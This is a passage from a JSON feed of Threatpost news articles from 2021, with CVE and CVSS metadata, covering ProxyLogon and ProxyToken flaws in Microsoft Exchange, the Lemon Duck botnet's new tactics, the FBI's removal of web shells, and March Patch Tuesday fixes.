Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat &amp; Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T06:29:15", "description": "The Lemon Duck cryptocurrency-mining botnet has added the [ProxyLogon group of exploits](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) to its bag of tricks, targeting Microsoft Exchange servers.\n\nThat\u2019s according to researchers at Cisco Talos, who said that the cybercrime group behind Lemon Duck has also added the Cobalt Strike attack framework into its malware toolkit and has beefed up anti-detection capabilities. On the latter front, it\u2019s using fake domains on East Asian top-level domains (TLDs) to hide command-and-control (C2) infrastructure.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nLemon Duck targets victims\u2019 computer resources to mine the Monero virtual currency, with self-propagating capabilities and a modular framework that allows it to infect additional systems that become part of the botnet. It has been active since at least the end of December 2018, and Cisco Talos calls it \u201cone of the more complex\u201d mining botnets, with several interesting tricks up its sleeve.\n\nFor instance, Lemon Duck has at least 12 different initial-infection vectors \u2013 more than most malware, with Proxylogon exploits only the latest addition. Its existing capabilities ranged from Server Message Block (SMB) and Remote Desktop Protocol (RDP) password brute-forcing; targeting the RDP BlueKeep flaw (CVE-2019-0708) in Windows machines; [targeting internet-of-things devices](<https://threatpost.com/lemon-duck-malware-targets-iot/152596/>) with weak or default passwords; and exploiting vulnerabilities in Redis (an open-source, in-memory data structure store used as a database, cache and message broker) and YARN Hadoop (a resource-management and job-scheduling technology) in Linux machines.\n\n\u201cSince April 2021, Cisco Talos has observed updated infrastructure and new components associated with the Lemon Duck that target unpatched Microsoft Exchange Servers and attempt to download and execute payloads for Cobalt Strike DNS beacons,\u201d according to [an analysis](<https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html>) released Friday.\n\nCisco Talos researchers [previously observed](<https://threatpost.com/lemon-duck-cryptocurrency-botnet/160046/>) an increase in DNS requests connected with Lemon Duck\u2019s C2 and mining servers last August, with the attacks mainly targeting Egypt, India, Iran, the Philippines and Vietnam. In the latest rash of attacks, which began in April, the group has changed up its geographic targets to focus primarily on North America, followed by Europe and Southeast Asia, and a handful of victims in Africa and South America.\n\n## **Targeting Exchange Servers with Monero-Mining**\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the deployment of ransomware.\n\nThe highly publicized exploit chain suffered a barrage of attacks from advanced persistent threat (APT) groups to infect systems with everything from ransomware to info-stealers, and now financially motivated groups are getting in on the action too.\n\nIn Lemon Duck\u2019s case, once the Exchange servers are compromised, it executes various system commands using the Windows Control Manager (sc.exe), including copying two .ASPX files named \u201cwanlins.aspx\u201d and \u201cwanlin.aspx.\u201d\n\n\u201cThese files are likely web shells and were copied from C:\\inetpub\\wwwroot\\aspnet_client\\, a known directory where a majority of the web shells were initially observed following Microsoft\u2019s release of details related to Hafnium activity,\u201d according to the research.\n\nNext, Cisco Talos researchers observed the echo command being used to write code associated with a web shell into the previously created ASPX files, and the modification of the Windows registry to enable RDP access to the system.\n\n\u201cIn this case, several characteristics matched portions of code associated with known China Chopper variants identified days after the Exchange Server vulnerabilities were publicized,\u201d they noted.\n\nOther interesting aspects of the latest campaign include the fact that Lemon Duck executes a PowerShell script that downloads and executes an additional malware payload, \u201csyspstem.dat,\u201d which includes a \u201ckiller\u201d module which contains a hardcoded list of competing cryptocurrency miners that Lemon Duck disables. The module is run every 50 minutes.\n\nAlso, the malware is now leveraging Certutil to download and execute two new malicious PowerShell scripts, researchers said. Certutil is a native Windows command-line program that is installed as part of Certificate Services. It is used to verify and dump Certificate Authority (CA) information, get and publish new certificate revocation lists, and so on.\n\nOne of the PowerShell scripts, named \u201cdn.ps1,\u201d attempts to uninstall multiple antivirus products, and also retrieves a Cobalt Strike payload.\n\n## **Cobalt Strike Added to the Mix**\n\n[Cobalt Strike is a penetration-testing tool](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) that\u2019s commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it [simulates an attack](<https://www.cobaltstrike.com/features>). Threat actors have since figured out how to [turn it against networks](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to exfiltrate data, deliver malware and create fake C2 profiles that look legitimate and avoid detection.\n\nLemon Duck\u2019s Cobalt Strike payload is configured as a Windows DNS beacon and attempts to communicate with the C2 server using a DNS-based covert channel, researchers noted. The beacon then communicates with this specific subdomain to transmit encoded data via DNS A record query requests.\n\n\u201cThis represents a new TTP for Lemon Duck, and is another example of their reliance [on offensive security tools (OSTs)](<https://threatpost.com/malicious-software-infrastructure-easier-deploy/162913/>), including Powersploit\u2019s reflective loader and a modified Mimikatz, which are already included as additional modules and components of Lemon Duck and used throughout the typical attack lifecycle,\u201d according to Cisco Talos.\n\n## **Lemon Duck\u2019s Fresh Anti-Detection Tricks**\n\nWhile Lemon Duck casts a wide net in terms of victimology, it has been exclusively using websites within the TLDs for China (\u201c.cn\u201d), Japan (\u201c.jp\u201d) and South Korea (\u201c.kr\u201d) for its C2 activities since February, rather than the more familiar \u201c.com\u201d or \u201c.net.\u201d\n\n\u201cConsidering these [TLDs] are most commonly used for websites in their respective countries and languages\u2026this may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments,\u201d according to Cisco Talos. \u201cDue to the prevalence of domains using these [TLDs], web traffic to the domains\u2026may be more easily attributed as noise to victims within these countries.\u201d\n\nDuring the Lemon Duck infection process, PowerShell is used to invoke the \u201cGetHostAddresses\u201d method from the .NET runtime class \u201cNet.Dns\u201d to obtain the current IP address for an attacker-controlled domain, researchers explained.\n\n\u201cThis IP address is combined with a fake hostname hardcoded into the PowerShell command and written as an entry to the Windows hosts file,\u201d they said. \u201cThis mechanism allows name resolution to continue even if DNS-based security controls are later deployed, as the translation is now recorded locally and future resolution requests no longer rely upon upstream infrastructure such as DNS servers. This may allow the adversary to achieve longer-term persistence once operational in victim environments.\u201d\n\n## **Cryptojackers Take Notice of ProxyLogon**\n\nLemon Duck is not the first cryptomining malware to add ProxyLogon to its arsenal. For instance, another cryptojacking group [was seen in mid-April](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) doing the same thing.\n\nThat bad code was fairly simple, but also in mid-April a heretofore little-seen Monero-mining botnet [dubbed Prometei](<https://threatpost.com/prometei-botnet-apt-attacks/165574/>) began exploiting two of the Microsoft Exchange vulnerabilities in ProxyLogon. This malware is also highly complex and sophisticated, Cybereason researchers noted at the time. While cryptojacking is its current game, researchers warned that Prometei (the Russian word for Prometheus, the Titan god of fire from Greek mythology) gives attackers complete control over infected machines, which makes it capable of doing a wide range of damage.\n\nThe threat will likely continue to evolve, Cisco Talos researchers said. They also observed domains linked to Lemon Duck and another cryptocurrency miner, DLTMiner, used in relation to Microsoft Exchange attacks where ransomware was also deployed.\n\n\u201cAt this time, there doesn\u2019t appear to be a link between the Lemon Duck components observed there and the reported ransomware (TeslaRVNG2),\u201d according to the analysis. \u201cThis suggests that given the nature of the vulnerabilities targeted, we are likely to continue to observe a range of malicious activities in parallel, using similar exploitation techniques and infection vectors to compromise systems. In some cases, attackers may take advantage of artifacts left in place from prior compromises, making distinction more difficult.\u201d\n\nMeanwhile, it\u2019s clear that the threat actor behind Lemon Duck is continuously evolving its approach to maximize the ability to achieve its mission objectives, researchers noted.\n\n\u201cLemon Duck continues to launch campaigns against systems around the world, attempting to leverage infected systems to mine cryptocurrency and generate revenue for the adversary behind this botnet,\u201d they concluded. \u201cThe use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments. \u2026 Organizations should remain vigilant against this threat, as it will likely continue to evolve.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-10T17:37:44", "type": "threatpost", "title": "Lemon Duck Cryptojacking Botnet Changes Up Tactics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0708", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-10T17:37:44", "id": "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "href": "https://threatpost.com/lemon-duck-cryptojacking-botnet-tactics/165986/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. These requests contain a SecurityToken cookie that identify them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain comprised of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-15T09:53:19", "description": "The Feds have cleared malicious web shells from hundreds of vulnerable computers in the United States that had been compromised via the now-infamous ProxyLogon Microsoft Exchange vulnerabilities.\n\nProxyLogon comprises a group of security bugs affecting on-premises versions of Microsoft Exchange Server software for email. Microsoft last month warned that the bugs were being [actively exploited](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) by the Hafnium advanced persistent threat (APT); after that, other researchers said that [10 or more additional APTs](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) were also using them.\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment, such as the [deployment of ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile patching levels have accelerated, this doesn\u2019t help already-compromised computers.\n\n\u201cMany infected system owners successfully removed the web shells from thousands of computers,\u201d explained the Department of Justice, in a [Tuesday announcement](<https://www.justice.gov/usao-sdtx/pr/justice-department-announces-court-authorized-effort-disrupt-exploitation-microsoft>). \u201cOthers appeared unable to do so, and hundreds of such web shells persisted unmitigated.\u201d\n\nThis state of affairs prompted the FBI to take action; in a court-authorized action, it issued a series of commands through the web shells to the affected servers. The commands were designed to cause the server to delete only the web shells (identified by their unique file path). It didn\u2019t notify affected organizations ahead of time, but authorities said they\u2019re sending out notices now.\n\n\u201cToday\u2019s court-authorized removal of the malicious web shells demonstrates the Department\u2019s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,\u201d said Assistant Attorney General John Demers for the DoJ\u2019s National Security Division, in the statement.\n\n## **Unilateral FBI Action Against ProxyLogon Exploits**\n\nOther technical details of the action are being kept under wraps, but Erkang Zheng, founder and CEO at JupiterOne, noted that the action is unprecedented.\n\n\u201cWhat makes this really interesting is the court ordered remote remediation of vulnerable systems,\u201d he said via email. \u201cThis is the first time that this has happened and with this as a precedent, it likely won\u2019t be the last. Many enterprises today have no idea what their infrastructure and security state looks like \u2013 visibility is a huge problem for CISOs.\u201d\n\nDirk Schrader, global vice president of security research at New Net Technologies, noted that the FBI\u2019s lack of transparency could be problematic.\n\n\u201cThere are a few critical issues in this,\u201d he told Threatpost. \u201cOne is the FBI stating the action was because these victims lack the technical ability to clear their infrastructure themselves, another is that it seems the FBI intends to delay informing the victims about the removal itself by at least a month, citing ongoing investigations as a reason.\u201d\n\nHe explained, \u201cThis can cause other issues, as the victims have no chance to investigate what kind of information has been accessed, whether additional backdoors where installed, and a range of other concerns come with this approach.\u201d\n\nMonti Knode, director of customer and partner success at Horizon3.AI, noted that the action illuminates just how dangerous the bugs are.\n\n\u201cGovernment action is always predicated by an authority to act,\u201d he said via email. \u201cBy specifically calling out \u2018protected computers\u2019 and declaring them \u2018damaged\u2019, that appears to have been enough to give the FBI a signed warrant to execute such an operation without notifying victims ahead of the operation execution. While the scale of the operation is unknown (redacted in court order), the fact that the FBI was able to execute in less than four days, and then publicly release this effort, demonstrates the potential national security risk posed by these exploited systems and the prioritized planning involved. This isn\u2019t a knee-jerk reaction.\u201d\n\nThis operation was successful in copying and removing the web shells, the FBI reported. However, organizations still need to patch if they haven\u2019t yet done so.\n\n\u201cCombined with the private sector\u2019s and other government agencies\u2019 efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country\u2019s cybersecurity,\u201d Denmers said. \u201cThere\u2019s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.\u201d\n\n## New Exchange RCE Bugs and a Federal Warning\n\nThe news comes on the heels of [April Patch Tuesday](<https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/>), in which Microsoft revealed more RCE vulnerabilities in Exchange (CVE-2021-28480 through CVE-2021-28483), which were discovered and reported by the National Security Agency. A [mandate to federal agencies](<https://cyber.dhs.gov/ed/21-02/#supplemental-direction-v2>) to patch them by Friday also went out.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber-threat research, warned that weaponization of these may come faster than usual, since motivated attackers will be able to use existing concept code.\n\n\u201cThis underlines the criticality of cybersecurity now to entire nations, as well as the continued blurring of the lines between nation-states, intelligence services and enterprise security,\u201d he added via email. \u201cWith a number of high-profile attacks affecting well-used enterprise software recently, the NSA are obviously keen to step up and play a proactive role.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "cvss3": {}, "published": "2021-04-14T17:31:13", "type": "threatpost", "title": "FBI Clears ProxyLogon Web Shells from Hundreds of Orgs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-14T17:31:13", "id": "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "href": "https://threatpost.com/fbi-proxylogon-web-shells/165400/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T13:10:52", "description": "Microsoft has released its regularly scheduled March Patch Tuesday updates, which address 89 security vulnerabilities overall.\n\nIncluded in the slew are 14 critical flaws and 75 important-severity flaws. Microsoft also included five previously disclosed vulnerabilities, which are being actively exploited in the wild.\n\nFour of the actively exploited flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), found [in Microsoft Exchange](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>), were disclosed as part of an emergency patch earlier this month by Microsoft; [businesses have been scrambling to patch their systems](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as the bugs continue to be exploited in targeted attacks. The fifth actively-exploited flaw exists in the Internet Explorer and Microsoft Edge browsers ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)). Proof-of-concept (PoC) exploit code also exists for this flaw, according to Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cFor all of March, Microsoft released patches for 89 unique CVEs covering Microsoft Windows components, Azure and Azure DevOps, Azure Sphere, Internet Explorer and Edge (EdgeHTML), Exchange Server, Office and Office Services and Web Apps, SharePoint Server, Visual Studio, and Windows Hyper-V,\u201d said Dustin Childs with Trend Micro\u2019s Zero Day Initiative, [on Tuesday](<https://www.zerodayinitiative.com/blog/2021/3/9/the-march-2021-security-update-review>).\n\n## **Internet Explorer\u2019s Actively Exploited Flaw**\n\nThe memory-corruption flaw ([CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>)) in Internet Explorer and Microsoft Edge could enable remote code execution. Researchers said the flaw could allow an attacker to run code on affected systems, if victims view a specially crafted HTML file.\n\n\u201cWhile not as impactful as the Exchange bugs, enterprises that rely on Microsoft browsers should definitely roll this out quickly,\u201d said Childs. \u201cSuccessful exploitation would yield code execution at the level of the logged-on user, which is another reminder not to browse web pages using an account with administrative privileges.\u201d\n\nPoC exploit code is also publicly available for the issue. The bug is \u201ctied to a vulnerability\u201d that was [publicly disclosed in early February](<https://enki.co.kr/blog/2021/02/04/ie_0day.html>) by ENKI researchers. The researchers claimed it was one of the vulnerabilities used in a [concerted campaign by nation-state actors to target security researchers](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>), and they said they would publish PoC exploit code for the flaw after the bug has been 